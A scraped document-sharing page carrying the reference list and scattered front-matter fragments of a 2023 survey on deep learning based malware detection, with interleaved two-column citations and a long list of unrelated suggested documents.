A. Imine, J.M. Fernandez, J.-Y. Marion, L. Logrippo, J. Garcia-Alfaro (Eds.), detection with deep neural network using process behavior, in: 2016 IEEE
FPS 2017, in: LNCS, vol. 10723, Springer, Cham, 2018, pp. 242–258. 40th Annual Computer Software and Applications Conference (COMPSAC),
[239] M. Scalas, D. Maiorca, F. Mercaldo, C.A. Visaggio, F. Martinelli, G. Giacinto, Vol. 2, 2016, p. 577e582.
R-PackDroid: practical on-device detection of Android ransomware, 2018, [262] R. Ronen, M. Radu, C.E. Feuerstein, E. Yomtov, M. Ahmadi, Microsoft
CoRR, abs/1805.09563. Malware classification challenge, Cryptogr. Secur. (2018) arXiv.

35
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

[263] T. Mikolov, I. Sutskever, K. Chen, G.S. Corrado, J. Dean, Distributed repre- [288] J. Sakhnini, H. Karimipour, A. Dehghantanha, R.M. Parizi, G. Srivastava,
sentations of words and phrases and their compositionality, in: Advances Security aspects of internet of things aided smart grids: a bibliometric
in Neural Information Processing Systems, 2013, pp. 3111–3119. survey, Internet Things (2019) 100111.
[264] Francesco Mercaldo, Antonella Santone, Deep learning for image-based [289] M. Binti Mohamad Noor, W.H. Hassan, Current research on internet of
mobile malware detection, J. Comput. Virol. Hacking Tech. (2020). things (IoT) security: a survey, Comput. Netw. 148 (2019) 283–294.
[265] K. Bakour, H.M. Ünver, VisDroid: Android malware classification based [290] K.D.T. Nguyen, T.M. Tuan, S.H. Le, A.P. Viet, M. Ogawa, N. Le Minh,
on local and global image features, a bag of visual words and machine Comparison of three deep learning-based approaches for IoT malware
learning techniques, Neural Comput. Appl. (2020).
detection, in: Proceedings of 2018 10th International Conference on
[266] I. Almomani, A. Alkhayer, W. El-Shafai, An automated vision-based deep
Knowledge and SystemsEngineering, KSE 2018, IEEE, 2018, pp. 382–388.
learning model for efficient detection of android malware attacks, IEEE
[291] H.S. Ham, H.H. Kim, M.S. Kim, M.J. Choi, Linear SVM-based android
Access 10 (2022) 2700–2720.
malware detection for reliable IoT services, J. Appl. Math. 2014 (2014)
[267] B. Yuan, J. Wang, P. Wu, X. Qing, IoT Malware classification based on
lightweight convolutional neural networks, IEEE Internet Things J. http: 594501.
//dx.doi.org/10.1109/JIOT.2021.3100063. [292] R. Kumar, X. Zhang, W. Wang, R.U. Khan, J. Kumar, A. Sharif, A multimodal
[268] Q. Li, J. Mi, W. Li, J. Wang, M. Cheng, CNN-based malware variants malware detection technique for android IoT devices using various
detection method for internet of things, IEEE Internet Things J. http: features, IEEE Access 7 (2019) 64411–64430.
//dx.doi.org/10.1109/JIOT.2021.3075694. [293] Z. Markel, M. Bilzor, Building a machine learning classifier for malware
[269] https://gs.statcounter.com/osmarketshare/mobile/worldwide. detection, in: WATeR 2014 - Proceedings of the 2014 2nd Workshop on
[270] F. Wei, S. Roy, X. Ou, et al., Amandroid: a precise and general inter- Anti-Malware Testing Research, IEEE, 2015.
component data flow analysis framework for security vetting of android [294] R. Taheri, M. Shojafar, M. Alazab, R. Tafazolli, Fed-IIoT: A robust federated
apps, in: Proceedings of the 2014ACMSIGSACConference on Computer and malware detection architecture in industrial IoT, IEEE Trans. Ind. Inform.
Communications Security, ACM, 2014, pp. 1329–1341. 17 (12) (2021) 8442–8452.
[271] Z. Yuan, Y. Lu, Y. Xue, Droiddetector: android malware characterization [295] M. Panda, A.A.A. Mousa, A.E. Hassanien, Developing an efficient feature
and detection using deep learning, Tsinghua Sci. Technol. 21 (01) (2016) engineering and machine learning model for detecting IoT-botnet cyber
114–123. attacks, IEEE Access 9 (2021) 91038–91052, http://dx.doi.org/10.1109/
[272] R. Feng, S. Chen, X. Xie, G. Meng, S.-W. Lin, Y. Liu, A performance-sensitive ACCESS.2021.3092054.
malware detection system using deep learning on mobile devices, IEEE
[296] S.A. Khowaja, P. Khuwaja, Q-learning and LSTM based deep active learn-
Trans. Inf. Forensics Secur. 16 (2021) 1563–1578, http://dx.doi.org/10.
ing strategy for malware defence in industrial IoT applications, Multimed.
1109/TIFS.2020.3025436.
Tools Appl. 80 (2021) 14637–14663.
[273] I.U. Haq, T.A. Khan, A. Akhunzada, A dynamic robust DL-based model for
[297] Regonda Nagaraju, Jupeth Toriano Pentang, Shokhjakhon Abdufattokhov,
android malware detection, IEEE Access 9 (2021) 74510–74521.
[274] H.-I. Kim, M. Kang, S.-J. Cho, S.-I. Choi, Efficient deep learning network Ricardo Fernando CosioBorda, N. Mageswari, G. Uganya, Attack preven-
with multi-streams for android malware family classification, IEEE Access tion in IoT through hybrid optimization mechanism and deep learning
10 (2022) 5518–5532. framework, Measurement: Sensors (ISSN: 2665-9174) 24 (2022) 100431.
[275] Z. Namrud, S. Kpodjedo, A. Bali, C. Talhi, Deep-layer clustering to identify [298] Rajasekhar Chaganti, Vinayakumar Ravi, Tuan D. Pham, Deep learn-
permission usage patterns of android app categories, IEEE Access 10 ing based cross architecture internet of things malware detection and
(2022) 24240–24254. classification, Comput. Secur. (ISSN: 0167-4048) 120 (2022) 102779.
[276] Abdullah Talha Kabakus, DroidMalwareDetector: A novel android mal- [299] Santosh K. Smmarwar, Govind P. Gupta, Sanjay Kumar, Deep malware
ware detection framework based on convolutional neural network, Expert detection framework for IoT-based smart agriculture, Comput. Electr. Eng.
Syst. Appl. (ISSN: 0957-4174) 206 (2022) 117833. (ISSN: 0045-7906) 104 (Part A) (2022) 108410.
[277] Arvind Mahindru, Amrit Sangal, SOMDROID: android malware detection [300] G.E. Hinton, Deep belief networks, Scholarpedia 4 (5) (2009) 5947.
by artificial neural network trained using unsupervised learning, Evol. [301] J. Hassannataj Joloudari, M. Haderbadi, A. Mashmool, M. Ghasemigol,
Intell. 15 (2022) http://dx.doi.org/10.1007/s12065-020-00518-1. S.S. Band, A. Mosavi, Early detection of the advanced persistent threat
[278] Junwei Tang, Ruixuan Li, Yu Jiang, Xiwu Gu, Yuhua Li, Android malware attack using performance analysis of deep learning, IEEE Access 8 (2020)
obfuscation variants detection method based on multi-granularity opcode
186125–186137.
features, Future Gener. Comput. Syst. (ISSN: 0167-739X) 129 (2022)
[302] N. Mohamed, B. Belaton, SBI model for the detection of advanced
141–151.
persistent threat based on strange behavior of using credential dumping
[279] L. Xu, D. Zhang, N. Jayasena, J. Cavazos, HADM: Hybrid analysis for
technique, IEEE Access 9 (2021) 42919–42932.
detection of malware, in: Y. Bi, S. Kapoor, Bhatia R. (Eds.), Proceedings of
[303] Meaad Alrehaili, Adel Alshamrani, Ala Eshmawi, A hybrid deep learning
SAI Intelligent Systems Conference (IntelliSys) 2016. IntelliSys 2016, in:
Lecture Notes in Networks and Systems, vol. 16, Springer, Cham, 2018. approach for advanced persistent threat attack detection, in: The 5th
[280] B. Anderson, D. Quist, J. Neil, C. Storlie, T. Lane, Graph-based malware International Conference on Future Networks & Distributed Systems
detection using dynamic analysis, J. Comput. Virol. 7 (4) (2011) 247–258. (ICFNDS 2021), Association for Computing Machinery, New York, NY, USA,
[281] S.L. SD, C.D. J, Windows malware detector using convolutional neural 2022, pp. 78–86.
network based on visualization images, IEEE Trans. Emerg. Top. Comput. [304] C. Do Xuan, M.H. Dao, A novel approach for APT attack detection based
[282] X. Huang, L. Ma, W. Yang, et al., A method for windows malware on combined deep learning model, Neural Comput. Appl. 33 (2021)
detection based on deep learning, J. Signal Process. Syst. (2020). 13251–13264.
[283] W. Aslam, M.M. Fraz, S.K. Rizvi, S. Saleem, Optimizing features for [305] H. Li, J. Wu, H. Xu, G. Li, M. Guizani, Explainable intelligence-driven
malware-benign clustering using windows portable executables, in: 2021 defence mechanism against advanced persistent threats: A joint edge
International Conference on Artificial Intelligence, ICAI, 2021, pp. 28–32. game and AI approach, IEEE Trans. Dependable Secure Comput. 19 (2)
[284] O. Sharma, A. Sharma, A. Kalia, Windows and IoT malware visualization (2022) 757–775.
and classification with deep CNN and Xception CNN using Markov images, [306] C. Do Xuan, D. Huong, A new approach for APT malware detection based
J. Intell. Inf. Syst. (2022). on deep graph network for endpoint systems, Appl. Intell. 52 (2022)
[285] S.K.J. Rizvi, W. Aslam, M. Shahzad, et al., PROUD-MAL: static analysis-
14005–14024.
based progressive framework for deep unsupervised malware classifi-
[307] S. Homayoun, et al., DRTHIS: deep ransomware threat hunting and
cation of windows portable executable, Complex Intell. Syst. 8 (2022)
intelligence system at the fog layer, Future Gener. Comput. Syst. 90 (2019)
673–685.
94–104.
[286] C. Petrov, Internet of things statistics from 2019 to justify the rise of
IoT, 2019, https://techjury.net/stats-about/internet-of-things-statistics/. [308] M. Al-Hawawreh, E. Sitnikova, N4. Aboutorab, Asynchronous peer-to-
Accessed 25 Oct 2019. peer federated capability-based targeted ransomware detection model for
[287] L. Columbus, IoT market predicted to double by 2021, reaching $520b, industrial IoT, IEEE Access 9 (2021) 148738–148755.
2018, https://www.forbes.com/sites/louiscolumbus/2018/08/16/iot- [309] X. Zhang, J. Wang, S. Zhu, Dual generative adversarial networks based
market-predicted-to-double-by-2021-reaching-520b/#768bbd9d1f94. unknown encryption ransomware attack detection, IEEE Access 10 (2022)
Accessed 13 Dec 2019. 900–913.

BPM Cbok 4.0
67% (3)
BPM Cbok 4.0
100 pages
QT Proposal
No ratings yet
QT Proposal
91 pages
Ransomware On Cyber-Physical Systems Taxonomies, Case Studies, Security Gaps, and Open Challenges
No ratings yet
Ransomware On Cyber-Physical Systems Taxonomies, Case Studies, Security Gaps, and Open Challenges
31 pages
Power Platform - Power Apps Security Assessment Penetration Test (2024.03.27)
No ratings yet
Power Platform - Power Apps Security Assessment Penetration Test (2024.03.27)
10 pages
Learning Malware Analysis
No ratings yet
Learning Malware Analysis
113 pages
Introduction To Generative AI
100% (1)
Introduction To Generative AI
77 pages
PDF International Standard Iso Iec 27042 - Compress
No ratings yet
PDF International Standard Iso Iec 27042 - Compress
24 pages
A Comprehensive Survey On Machine Learning Techniques For Android Malware Detection
No ratings yet
A Comprehensive Survey On Machine Learning Techniques For Android Malware Detection
12 pages
Threat Modeling Cheatsheet
No ratings yet
Threat Modeling Cheatsheet
12 pages
Malware Lab Concept
No ratings yet
Malware Lab Concept
44 pages
Malware Detection and Evasion With Machine Learning Techniques: A Survey
No ratings yet
Malware Detection and Evasion With Machine Learning Techniques: A Survey
9 pages
Windows API For Red Team 102
No ratings yet
Windows API For Red Team 102
25 pages
Deploying Darktrace AWS Security Module
No ratings yet
Deploying Darktrace AWS Security Module
11 pages
Malware Analysis Professional: Anti-Reversing Tricks: Part 1
No ratings yet
Malware Analysis Professional: Anti-Reversing Tricks: Part 1
45 pages
Regulatory Guideline For Mobile Banking App Security
100% (1)
Regulatory Guideline For Mobile Banking App Security
3 pages
230 Hunting Web Shells
No ratings yet
230 Hunting Web Shells
151 pages
OSDA Exam Report Template OS v1
100% (1)
OSDA Exam Report Template OS v1
8 pages
RiskIQ Flashpoint Inside MageCart Report PDF
No ratings yet
RiskIQ Flashpoint Inside MageCart Report PDF
59 pages
Anti-Phishing Tools A Thorough Comparison of Features and Performance
No ratings yet
Anti-Phishing Tools A Thorough Comparison of Features and Performance
7 pages
PDF Course Advanced Malware Analysis PDF
No ratings yet
PDF Course Advanced Malware Analysis PDF
2 pages
Learning and Understanding: Test-Driven Development in Software Development
No ratings yet
Learning and Understanding: Test-Driven Development in Software Development
5 pages
Fase 5
No ratings yet
Fase 5
14 pages
Detecting Malware in Portable Executable Files Using Machine Learning Approach
No ratings yet
Detecting Malware in Portable Executable Files Using Machine Learning Approach
7 pages
Analysis of Ransomware Attacks
100% (1)
Analysis of Ransomware Attacks
11 pages
BitLocker Drive Encryption Flow
No ratings yet
BitLocker Drive Encryption Flow
36 pages
Phishing Attack Seminar
No ratings yet
Phishing Attack Seminar
20 pages
IA CT: CTIA Exam Blueprint v1
No ratings yet
IA CT: CTIA Exam Blueprint v1
3 pages
Question Bank Ann
50% (2)
Question Bank Ann
2 pages
An Introduction To The Honeypots
No ratings yet
An Introduction To The Honeypots
24 pages
Examining Ryuk Ransomware - Blog
No ratings yet
Examining Ryuk Ransomware - Blog
8 pages
Sangfor SCP User Manual
No ratings yet
Sangfor SCP User Manual
145 pages
DORA Acticles Breakdown
No ratings yet
DORA Acticles Breakdown
57 pages
Android Malware Detection Using Machine Learning
No ratings yet
Android Malware Detection Using Machine Learning
4 pages
Everything You Wanted To Know About The Health of Your DAM Deployment!
No ratings yet
Everything You Wanted To Know About The Health of Your DAM Deployment!
28 pages
Ransomware Attacks: Detection, Prevention and Cure: Old Tricks
100% (1)
Ransomware Attacks: Detection, Prevention and Cure: Old Tricks
5 pages
Learning Objectives of Memory Analysis: SEPTEMBER 27, 2020
No ratings yet
Learning Objectives of Memory Analysis: SEPTEMBER 27, 2020
14 pages
Privilege Escalation Attack Detection and Mitigation in Cloud Using Machine Learning
No ratings yet
Privilege Escalation Attack Detection and Mitigation in Cloud Using Machine Learning
69 pages
IITK Malware Problem Final PDF
No ratings yet
IITK Malware Problem Final PDF
5 pages
Artificial Intelligence
No ratings yet
Artificial Intelligence
14 pages
From ChatGPT To ThreatGPT Impact of Generative AI in Cybersecurity and Privacy
No ratings yet
From ChatGPT To ThreatGPT Impact of Generative AI in Cybersecurity and Privacy
28 pages
Online Training Course Catalog
No ratings yet
Online Training Course Catalog
32 pages
Gartner Market Guide For Ueba 2018 Analyst Report
No ratings yet
Gartner Market Guide For Ueba 2018 Analyst Report
22 pages
Building A Malware Analysis Lab
No ratings yet
Building A Malware Analysis Lab
9 pages
Microsoft 365 Business Premium
No ratings yet
Microsoft 365 Business Premium
1 page
Cyber Kill Chain Wrozek PDF
No ratings yet
Cyber Kill Chain Wrozek PDF
30 pages
The Osint Cyber War 2023-06-19
No ratings yet
The Osint Cyber War 2023-06-19
26 pages
30 Cybersecurity Search Engines For Researchers
No ratings yet
30 Cybersecurity Search Engines For Researchers
2 pages
Keysight Threat Simulator For Healthcare Providers
No ratings yet
Keysight Threat Simulator For Healthcare Providers
32 pages
COIT20263 Information Security Management - Assignment 2
No ratings yet
COIT20263 Information Security Management - Assignment 2
5 pages
RFP Sast: SWOT Analysis: Checkmarx
No ratings yet
RFP Sast: SWOT Analysis: Checkmarx
5 pages
Standard Implementation in Cloud Forensics PDF
No ratings yet
Standard Implementation in Cloud Forensics PDF
5 pages
Code Injection and Hooking
No ratings yet
Code Injection and Hooking
54 pages
Machine Learning Detection
No ratings yet
Machine Learning Detection
13 pages
FireEye Endpoint Deployment Quick Start Guide
No ratings yet
FireEye Endpoint Deployment Quick Start Guide
9 pages
ITB1 Documentation Detection of Phishing Website Using ML
No ratings yet
ITB1 Documentation Detection of Phishing Website Using ML
49 pages
DS ThreatEmulation Final
No ratings yet
DS ThreatEmulation Final
2 pages
Gbenga Adewale 16023455 CC6051 Ethical Hacking
No ratings yet
Gbenga Adewale 16023455 CC6051 Ethical Hacking
16 pages
3 IllustrEx
No ratings yet
3 IllustrEx
16 pages
Malware Analysis
No ratings yet
Malware Analysis
5 pages
Ethical Hacking Fundamentals Labs
No ratings yet
Ethical Hacking Fundamentals Labs
2 pages
CPENTbrochure
No ratings yet
CPENTbrochure
9 pages
Mushkan Report
No ratings yet
Mushkan Report
67 pages
Security Goals in IoT
No ratings yet
Security Goals in IoT
7 pages
Dissertation Christian Dietrich PDF
No ratings yet
Dissertation Christian Dietrich PDF
139 pages
(M) BROCHURE - Data Science Learning Path
No ratings yet
(M) BROCHURE - Data Science Learning Path
33 pages
Nessus and OpenVAS
No ratings yet
Nessus and OpenVAS
4 pages
MTECH Handbook
No ratings yet
MTECH Handbook
18 pages
Decision Tree Classifier For Parametric Fault Detection in Electrical Submersible Pumps
No ratings yet
Decision Tree Classifier For Parametric Fault Detection in Electrical Submersible Pumps
4 pages
Opinion Mining For Business Reviews Classification Using Social Media Data-A Review of Literature
No ratings yet
Opinion Mining For Business Reviews Classification Using Social Media Data-A Review of Literature
3 pages
Data Mining CS4168 Lecture 5 Basics of Classification 1
No ratings yet
Data Mining CS4168 Lecture 5 Basics of Classification 1
25 pages
Digital Version - The 10 Most Iconic CEO's To Watch in 2024
No ratings yet
Digital Version - The 10 Most Iconic CEO's To Watch in 2024
52 pages
Trends Assignment
No ratings yet
Trends Assignment
15 pages
Alzheimer's Disease Detection Using Deep Learning On Neuroimaging A Systematic Review
No ratings yet
Alzheimer's Disease Detection Using Deep Learning On Neuroimaging A Systematic Review
42 pages
Prediction of In-Place Density of Soil Using SPT N
No ratings yet
Prediction of In-Place Density of Soil Using SPT N
10 pages
THE APPLIED DATA SCIENCE WORKSHOP Urinary Biomarkers Based Pancreatic Cancer Classification and Prediction (Vivian Siahaan Rismon Hasiholan Sianipar) (Z-Library)
No ratings yet
THE APPLIED DATA SCIENCE WORKSHOP Urinary Biomarkers Based Pancreatic Cancer Classification and Prediction (Vivian Siahaan Rismon Hasiholan Sianipar) (Z-Library)
491 pages
Deepfakes (Nina Schick)
No ratings yet
Deepfakes (Nina Schick)
155 pages
Job Description ML Intern (Remote) - Quantrium
No ratings yet
Job Description ML Intern (Remote) - Quantrium
2 pages
A Framework For Process Risk Assessment Incorporating Prior Hazard
No ratings yet
A Framework For Process Risk Assessment Incorporating Prior Hazard
19 pages
Mcse615l - Data-Analytics - TH - 1.0 - 71 - Mcse615l - 67 Acp
No ratings yet
Mcse615l - Data-Analytics - TH - 1.0 - 71 - Mcse615l - 67 Acp
2 pages
Midterm
No ratings yet
Midterm
4 pages
ECE DMAI V2404 MSC Data Management Articicial Intelligence
No ratings yet
ECE DMAI V2404 MSC Data Management Articicial Intelligence
2 pages
Checkpoint 2 Revision
No ratings yet
Checkpoint 2 Revision
17 pages
Applying Machine Learning Methods To Predict Geology Using Soil Sample Geochemistry
No ratings yet
Applying Machine Learning Methods To Predict Geology Using Soil Sample Geochemistry
13 pages
Artificial Intelligence: Guidance By: Mr. Manoj Sir
No ratings yet
Artificial Intelligence: Guidance By: Mr. Manoj Sir
13 pages
Optimizing Edge AI - A Comprehensive Survey On Data, Model, and System Strategies
No ratings yet
Optimizing Edge AI - A Comprehensive Survey On Data, Model, and System Strategies
31 pages
IT in Space A Seminar
No ratings yet
IT in Space A Seminar
10 pages
Introduction To Machine Learning - Midterm Quiz 1
No ratings yet
Introduction To Machine Learning - Midterm Quiz 1
10 pages
Face Transformer For Recognition
No ratings yet
Face Transformer For Recognition
5 pages
Program Overview: Key Highlights
No ratings yet
Program Overview: Key Highlights
5 pages
Tailor Shaikshavali (J)
No ratings yet
Tailor Shaikshavali (J)
2 pages

A Comprehensive Survey On Deep Learning Based Malware Detectiontechniques

Uploaded by

A Comprehensive Survey On Deep Learning Based Malware Detectiontechniques

Uploaded by

Computer Science Review 47 (2023) 100529

Contents lists available at ScienceDirect

Computer Science Review

A comprehensive survey on deep learning based malware detection

5.4. IoT malware detection techniques ...................................................................................................................................................................... 16

detecting malware that uses signatures are frequently employed.

Fig. 1. Taxonomy of research.

Fig. 2. Deep Learning architecture.

Fig. 3. Deep Neural Network (DNN).

Fig. 4. Convolutional Neural Network (CNN).

Fig. 5. Recurrent Neural Network (RNN).

Fig. 6. Malware detection process based on image processing.

Fig. 7. IoT Malware detection using ML classifiers.

Fang et al. (2019) [60] PE, RL Static DQEAF

• The Internet of Things is expanding since every gadget is Data availability

You might also like